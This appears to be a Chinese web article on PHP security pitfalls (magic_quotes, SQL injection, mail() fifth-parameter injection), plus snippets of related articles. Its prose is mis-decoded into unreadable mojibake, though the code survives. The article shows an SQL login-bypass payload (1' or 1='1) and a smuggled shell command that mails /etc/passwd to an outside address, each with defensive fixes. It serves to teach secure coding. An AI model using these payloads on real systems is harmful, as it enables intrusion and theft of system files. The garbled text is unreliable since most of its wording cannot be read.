Ò׽ؽØͼÈí¼þ¡¢µ¥Îļþ¡¢Ãâ°²×°¡¢´¿ÂÌÉ«¡¢½ö160KB

PHPÍøÕ¾¿ª·¢¹ý³ÌÖÐ×¢ÒâÕâЩ°²È«ÖªÊ¶

1¡¢¹ÅÀϵÄÆÛÆ­SQLÓï¾ä
ÔÚĬÈÏģʽÏ£¬¼´Ê¹ÊÇÄãÍüÁË°Ñphp.ini¿½µ½/usr/local/lib/php.iniÏ£¬php»¹ÊÇ´ò¿ªmagic_quotes_gpc=on¡£
ÕâÑùËùÓдÓGET/POST/CookieÀ´µÄ±äÁ¿µÄµ¥ÒýºÅ(')¡¢Ë«ÒýºÅ(")¡¢·´Ð±¸Übackslash(\)ÒÔ¼°¿Õ×ÖÔªNUL
(the null byte)¶¼»á±»¼ÓÉÏ·´Ð±¸Ü£¬ÒÔʹÊý¾Ý¿âÄܹ»ÕýÈ·²éѯ¡£
µ«ÊÇÔÚphp-4-RC2µÄʱºòÒýÈëÁËÒ»¸öÅäÖÃÎļþphp.ini-optimized£¬Õâ¸öÓÅ»¯µÄphp.iniÈ´ÊÇ
magic_quotes_gpc=offµÄ¡£Ä³Ð©Íø¹Ü¿´µ½optimized×ÖÑùÒ²Ðí¾Í»á°Ñphp.ini-optimized¿½µ½
/usr/local/lib/php.ini£¬Õâʱ¾Í±È½ÏΣÏÕ¡£Ïó±È½Ï¼òµ¥µÄÑéÖ¤£¬¼ÙÉèûÓйýÂ˱ØÒªµÄ×Ö·û£º
select * from login where user='$HTTP_POST_VARS[user]' and pass='$HTTP_POST_VARS[pass]'
ÎÒÃǾͿÉÒÔÔÚÓû§¿òºÍÃÜÂë¿òÊäÈë1‘ or 1='1ͨ¹ýÑéÖ¤ÁË¡£ÕâÊǷdz£¹Å¶­µÄ·½·¨ÁË£¬Õâ¸öÓï¾ä»á
Ìæ»»³ÉÕâÑù£º
select * from login where user='1' or 1='1' and pass='1' or 1='1'
ÒòΪor 1='1'³ÉÁ¢£¬ËùÒÔͨ¹ýÁË¡£
½â¾öµÄ°ì·¨×îºÃ¾ÍÊǹýÂËËùÓв»±ØÒªµÄ×Ö·û£¬»¹ÓоÍÊÇÍƼö¶ÔÓÚ´ÓGET/POST/CookieÀ´µÄ²¢ÇÒÓÃÔÚSQL
ÖеıäÁ¿¼ÓÒ»¸ö×Ô¶¨ÒåµÄº¯Êý£º
function gpc2sql($str) {
if(get_magic_quotes_gpc()==1)
return $str;
else
return addslashes($str);
}
Ö÷ÒªÊÇΪÁËÄãµÄ³ÌÐòÄÜ°²È«ÒÆÖ²ÔÚ¸÷ÖÖϵͳÀï¡£
2¡¢mailº¯ÊýµÄµÚÎå¸ö²ÎÊý
ÔÚphp-4.0.5µÄʱºò£¬mailº¯ÊýÒýÈëÁ˵ÚÎå¸ö²ÎÊý£¬ÓÃÀ´ÉèÖÃÔÚʵ¼Ê·¢ËÍÓʼþµÄʱºòÔö¼Ó¶îÍâµÄÃüÁîÐвÎÊý£¬µ«ÊÇûÓкܺõļì²éÌØÊâSHELLÃüÁî×Ö·û£¬ËùÒÔ³öÏÖÖ´ÐÐÃüÁîµÄ´óÎÊÌâ¡£¾ÍÏñÊÖ²áÀïµÄÀý×Ó£º
mail("nobody@aol.com", "the subject", $message, "from: webmaster@$SERVER_NAME", "-fwebmaster@$SERVERNAM");
Õâ¸öÊÇ´æÔÚÎÊÌâµÄ£¬Èç¹û$SERVER_NAME=;mail webjx@webjx.com < /etc/passwd¾ÍÄÜ°Ñ»úÆ÷µÄÃÜÂë·¢Ë͵½ÎÒµÄÐÅÏäÁË¡£
ÕâÀïÌáÐÑһϣ¬phpÊÖ²áÀﻹÓкü¸¸öÀý×Ó´æÔÚ°²È«ÎÊÌâµÄ£¬´ó¼Òʵ¼ÊʹÓõÄʱºò²»ÒªÕհᣬËüÖ»ÊÇÑÝʾº¯ÊýµÄ»ù±¾¹¦ÄÜ£¬Àí½âÁ˾ͿÉÒÔÁË¡£
¶ÔÓÚmailº¯ÊýµÄÕâ¸öÎÊÌ⣬×î¼òµ¥µÄÎÒÃǾͲ»ÓÃÕâ¸öµÚÎå¸ö²ÎÊý£¬ÒªÊ¹Óþ͹ýÂË·Ç·¨µÄ×Ö·ûÈç(;)£¬»¹ÓоÍÊÇÐÞ¸ÄphpÔ´Âë°üµÄ³ÌÐòext/standard/mail.c£¬ÔÚif (extra_cmd != NULL) { Ç°Ôö¼ÓÈçÏÂÒ»ÐУº
extra_cmd=NULL
È»ºóÖØбàÒë¡£
3¡¢UNIX°æµÄrequire, includeº¯Êý
win°æ±¾µÄrequireºÍincludeº¯ÊýÊDz»Ö§³ÖHTTPºÍFTPÔ¶³ÌÎļþ°üº¬µÄ£¬¶øUNIX°æ±¾Ä¬È϶¼ÊÇÖ§³Ö


Ïà¹ØÎĵµ£º

PHPÎļþÉÏ´«Ô´Âë·ÖÎö(RFC1867)

ÎļþÉÏ´«,Ò»°ã·ÖΪÁ©ÖÖ·½Ê½FTPºÍHTTP, ¶ÔÓÚÎÒÃǵĻ¥ÁªÍøÓ¦ÓÃÀ´Ëµ: FTPÉÏ´«ËäÈ»´«ÊäÎȶ¨, µ«ÊÇÒ×ÓÃÐԺͰ²È«ÐÔ¶¼ÊǸöÎÊÌâ. Äã×ܲ»ÖÁÓÚÔÚÓû§ÒªÉÏ´«Í·ÏñµÄʱºò¸æËßÓû§”Çë´ò¿ªFTP¿Í»§¶Ë,ÉÏ´«Îļþµ½http://www.laruence.com/uploads/ÖÐ, ²¢ÒÔ2dk433423l.jpgÃüÃû”°É?
¶ø»ùÓÚHTTPµÄÉÏ´«,Ïà¶ÔÀ´ËµÒ×ÓÃÐԺͰ²È«ÐÔÉÏ¾Í ......

php ¶ÁÈ¡ ħÊÞDBCÎļþ

»°ËµÍ·ÌÛÁËNÌìµÄÎÊÌâ,½ñÌìÖÕÓÚ½â¾öÁË¡£
Òª×öMangosµÄ¹ÜÀíÈí¼þ£¬Copy¶àÍæħÊÞÊý¾Ý¿â×öÁ˸öÏàͬ¹¦ÄܵijÌÐò£¬µ«ÊÇ¿ª·¢Öз¢ÏÖ²¢²»ÊÇÈ«²¿µÄÐÅÏ¢¶¼ÌåÏÖÔÚÊý¾Ý¿âÀï¡£
ΨһµÄ½â¾ö·½·¨¾ÍÊÇÈ¥¶ÁÈ¡dbcÎļþ¡£
×ʼÏëµ½µÄ¾ÍÊÇʹÓÃÀàËƶÁÈ¡ip¿âµÄ·½·¨¡£µ«ÊÇÎÊÌâºÜÃ÷ÏÔ£¬²»Í¬µÄ¿âÎļþ´æ·ÅµÄÍ·Îļþ³¤¶È²»Í¬£¬Ö»ÄÜÒ»µãÒ»µãµÄÊÔ»òÊÇÔÚÍøÉ ......

PHP´úÂë¹æ·¶

1. ½éÉÜ
1.1. ±ê×¼»¯µÄÖØÒª**
±ê×¼»¯ÎÊÌâÔÚijЩ·½ÃæÉÏÈÃÿ¸öÈËÍ·Í´£¬ÈÃÈËÈ˶¼¾õµÃ´ó¼Ò´¦ÓÚͬÑùµÄ¾³µØ¡£ÕâÓÐÖúÓÚÈÃÕâЩ½¨ÒéÔÚÐí¶àµÄÏîÄ¿Ö⻶ÏÑݽø£¬Ðí¶à¹«Ë¾»¨·ÑÁËÐí¶àÐÇÆÚÖð×Ó×ÖÖð¾äµÄ½øÐÐÕùÂÛ¡£±ê×¼»¯²»ÊÇÌØÊâµÄ¸öÈË·ç¸ñ£¬Ëü¶Ô±¾µØ¸ÄÁ¼ÊÇÍêÈ«¿ª·ÅµÄ¡£
1.2. Óŵã
µ±Ò»¸öÏîÄ¿³¢ÊÔ×Å×ñÊع«Óõıê׼ʱ£¬»áÓÐÒÔϺô¦£ ......

PHPÊֲᷭÒëÈÕ¼Ç [6] Èô¸É½á¹¹¸Ä±ä

¹úÇ쳤¼Ù½«ÖÁ£¬ÕæÊÇ¿ªÐÄ¡£ÕâÁ½ÌìÓеãС¿Õ£¬·­ÒëÁËÊÖ²áÖеÄһЩÄÚÈÝ£¬ËãÊǸøPHPerÃǵÄÒ»¸öСÀñÎï¡£
±¾À´Ïë°ÑËùÓÐPHP5.3µÄÐÂÄÚÈݸø¸üÐÂÁË£¬µ«·¢ÏÖÊÖ²áÓкܴóµÄ¸Ä¶¯£¬ÓÈÆäÊÇһЩĿ¼½á¹¹Éϵķ¢¶¯¡£±ØÐëÏȸúÉÏÕâЩ¸Ä¶¯£¬·ñÔò±àÒë»á³ö´í£¬¸ü̸²»ÉϽøÒ»²½µÄ·­Òë¡£
ÕâÁ½ÌìÖ÷Òª×öÁËÒÔϹ¤×÷£º
1. ½«·­Òëƽ̨ǨÒƵ½SVN
PHP¹Ù·½µÄ ......

PHPÒ³Ãæ´«ÖµµÄ6ÖÖ»ñÈ¡·½·¨

1¡¢PHP4ÒÔºó»ñÈ¡´«ÖµµÄ·½·¨
Ò»°ãÔÚÒ³ÃæÖд«Öµ³£¼ûµÄÊÇPOST¡¢GETºÍCOOKIE¼¸ÖÖ£¬ËùÒÔÏÂÃæÎÒÒ²Ö÷Òª½éÉÜÕ⼸ÖÖ¡£PHP4ÒԺ󶼲ÉÓõÄÊÇ$_POST¡¢$_GETµÈÊý×éÀ´»ñÈ¡ÍøÒ³´«Öµ¡£ÔÚPHP3.0¼°ÒÔÏ°汾¶¼ÊÇÓõÄÊÇ$HTTP_POST_VARS¡¢$HTTP_GET_VARSµÈÊý×飬¾ßÌå´úÂëÈçÏÂ
echo $_POST['dopost'];
?>
< form action="weste_net.php" ......
© 2009 ej38.com All Rights Reserved. ¹ØÓÚE½¡ÍøÁªÏµÎÒÃÇ | Õ¾µãµØͼ | ¸ÓICP±¸09004571ºÅ